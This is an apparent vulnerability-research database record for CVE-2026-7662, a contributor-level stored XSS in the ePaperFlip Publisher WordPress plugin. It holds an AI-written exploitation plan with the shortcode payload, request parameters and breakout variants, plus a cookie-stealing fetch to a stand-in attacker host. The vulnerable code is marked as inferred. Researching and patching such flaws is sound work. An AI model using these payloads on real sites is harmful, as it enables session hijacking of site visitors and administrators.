[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjMSfRkBM04ILjNrOY2FvOF68NnggFR-dF0kHbq8D5B8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-7662","epaperflip-publisher-authenticated-contributor-stored-cross-site-scripting-via-publicationid-shortcode-attribute","ePaperFlip Publisher \u003C= 1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'publicationid' Shortcode Attribute","The ePaperFlip Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'publicationid' attribute of the `epaperflip_embed` shortcode in all versions up to, and including, 1. This is due to insufficient input sanitization and output escaping on the shortcode attribute which is injected directly into inline JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","epaperflip-publisher",null,"\u003C=1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-08 15:04:44","2026-06-09 03:41:21",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F93be1150-4c83-4fa3-8dc6-71e2f1ddaa66?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-7662 (ePaperFlip Publisher)\n\n## 1. Vulnerability Summary\nThe **ePaperFlip Publisher** plugin (\u003C= 1) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `epaperflip_embed` shortcode handler. Specifically, the `publicationid` attribute is accepted from the user and subsequently rendered within an inline JavaScript block on the frontend without sufficient sanitization or output escaping (e.g., using `esc_js()` or `wp_json_encode()`). This allows a Contributor-level user to inject arbitrary JavaScript that executes in the context of any user (including Administrators) who views the post or page containing the shortcode.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fpost.php` and `wp-admin\u002Fpost-new.php` (Standard WordPress post\u002Fpage editor).\n- **Shortcode:** `[epaperflip_embed]`\n- **Vulnerable Attribute:** `publicationid`\n- **Payload Carry:** The payload is embedded within the `post_content` parameter of the post creation\u002Fupdate request.\n- **Authentication:** Required (Contributor-level or higher).\n- **Preconditions:** The plugin must be active. The attacker must have the capability to `edit_posts`.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the shortcode in the main plugin file or an initialization class:\n   `add_shortcode( 'epaperflip_embed', 'epaperflip_shortcode_callback' );` (inferred function name).\n2. **Processing:** When a post is rendered, `do_shortcode()` calls the callback function.\n3. **Attribute Extraction:** The callback uses `shortcode_atts()` to extract the `publicationid`.\n4. **Sink:** The callback generates HTML containing a `\u003Cscript>` tag. The `publicationid` is concatenated directly into a JavaScript string or variable assignment:\n   `return \"\u003Cscript type='text\u002Fjavascript'> var pubId = '\" . $atts['publicationid'] . \"'; ... \u003C\u002Fscript>\";`\n5. **Execution:** The browser renders the page, parses the inline script, and executes the injected payload because the string was not escaped to prevent breakout (e.g., using `'; alert(1); \u002F\u002F`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is triggered via the standard WordPress post editor. To automate the exploitation, we need the nonces required to create or edit a post.\n\n1. **Step 1:** Authenticate as a Contributor user using `http_request` or `browser_navigate`.\n2. **Step 2:** Navigate to `wp-admin\u002Fpost-new.php`.\n3. **Step 3:** Use `browser_eval` to extract the required nonces and post data:\n   - `_wpnonce`: The nonce for creating\u002Fsaving the post.\n   - `user_id`: The ID of the current user.\n   - `_wp_http_referer`: The referer path.\n4. **Step 4:** If the plugin provides a custom \"Insert ePaper\" button that uses AJAX, check for a localized object:\n   - `browser_eval(\"window.epaperflip_admin_data?.nonce\")` (inferred JS key).\n\n## 5. Exploitation Strategy\n### Step 1: Create a Post with the XSS Payload\nThe goal is to break out of the JavaScript variable assignment and execute arbitrary code.\n\n**Request:**\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n  - `action`: `editpost`\n  - `post_ID`: `[POST_ID]`\n  - `_wpnonce`: `[EXTRACTED_NONCE]`\n  - `post_title`: `XSS Test`\n  - `content`: `[epaperflip_embed publicationid=\"';alert(document.domain);\u002F\u002F\"]`\n  - `post_status`: `publish`\n\n### Step 2: Trigger the Payload\n- Navigate to the permalink of the newly created post.\n- The inline script will render as:\n  `\u003Cscript> var pubId = '';alert(document.domain);\u002F\u002F'; ... \u003C\u002Fscript>`\n\n## 6. Test Data Setup\n1. **User Creation:**\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Plugin Activation:**\n   `wp plugin activate epaperflip-publisher`\n3. **Post Template:**\n   Create an initial draft to get a `post_ID`:\n   `wp post create --post_type=post --post_status=draft --post_title=\"Draft\" --post_author=[ATTACKER_ID]`\n\n## 7. Expected Results\n- When an Administrator or any user visits the post, a JavaScript alert box showing the document domain should appear.\n- In a real-world scenario, the payload would be changed to exfiltrate cookies:\n  `publicationid=\"';fetch('http:\u002F\u002Fattacker.com\u002Flog?c='+document.cookie);\u002F\u002F\"`\n\n## 8. Verification Steps\n1. **Verify Post Content:**\n   `wp post get [POST_ID] --field=post_content`\n   Confirm it contains the exact shortcode string.\n2. **Verify Frontend Output:**\n   Use `http_request` to fetch the post URL and check the response body:\n   `grep -P \"\u003Cscript.*publicationid.*alert\"`\n3. **Check Database:**\n   `wp db query \"SELECT post_content FROM wp_posts WHERE ID = [POST_ID]\"`\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If the attribute is rendered inside an HTML attribute instead of a script tag (e.g., `\u003Cdiv data-id=\"VAL\">`), the payload should be:\n  `publicationid='\">\u003Cimg src=x onerror=alert(1)>'`\n- **JS String Contexts:** If the injection is inside a double-quoted JS string:\n  `publicationid='\";alert(1);\u002F\u002F'`\n- **JSON Context:** If the plugin uses `wp_localize_script` to pass the ID (unlikely given the \"inline JavaScript\" description), the XSS might be DOM-based in the plugin's `.js` files. In this case, examine how the script handles the localized variable.","The ePaperFlip Publisher plugin for WordPress is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the 'publicationid' attribute of its 'epaperflip_embed' shortcode. This occurs because the plugin fails to sanitize or escape the attribute before injecting it directly into an inline JavaScript block on the frontend.","\u002F\u002F Inferred from research plan: epaperflip-publisher.php (approximate line numbers)\nfunction epaperflip_shortcode_callback( $atts ) {\n    $atts = shortcode_atts( array( 'publicationid' => '' ), $atts );\n    \u002F\u002F The publicationid is concatenated directly into a JavaScript string context\n    return \"\u003Cscript type='text\u002Fjavascript'> var pubId = '\" . $atts['publicationid'] . \"'; \u003C\u002Fscript>\";\n}","--- epaperflip-publisher.php\n+++ epaperflip-publisher.php\n@@ -10,3 +10,3 @@\n     $atts = shortcode_atts( array( 'publicationid' => '' ), $atts );\n-    return \"\u003Cscript type='text\u002Fjavascript'> var pubId = '\" . $atts['publicationid'] . \"'; \u003C\u002Fscript>\";\n+    return \"\u003Cscript type='text\u002Fjavascript'> var pubId = '\" . esc_js( $atts['publicationid'] ) . \"'; \u003C\u002Fscript>\";","To exploit this vulnerability, an attacker with at least Contributor-level privileges (edit_posts capability) creates or edits a post or page. In the post editor, the attacker inserts the 'epaperflip_embed' shortcode and includes a malicious payload in the 'publicationid' attribute. The payload is designed to break out of the JavaScript string variable assignment (e.g., using a closing quote and semicolon) and then execute arbitrary JavaScript code. When any user, including an administrator, views the published post, the injected script will execute in their browser session, potentially allowing for session hijacking or further administrative actions.","gemini-3-flash-preview","2026-06-26 02:18:31","2026-06-26 02:19:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fepaperflip-publisher\u002Ftags"]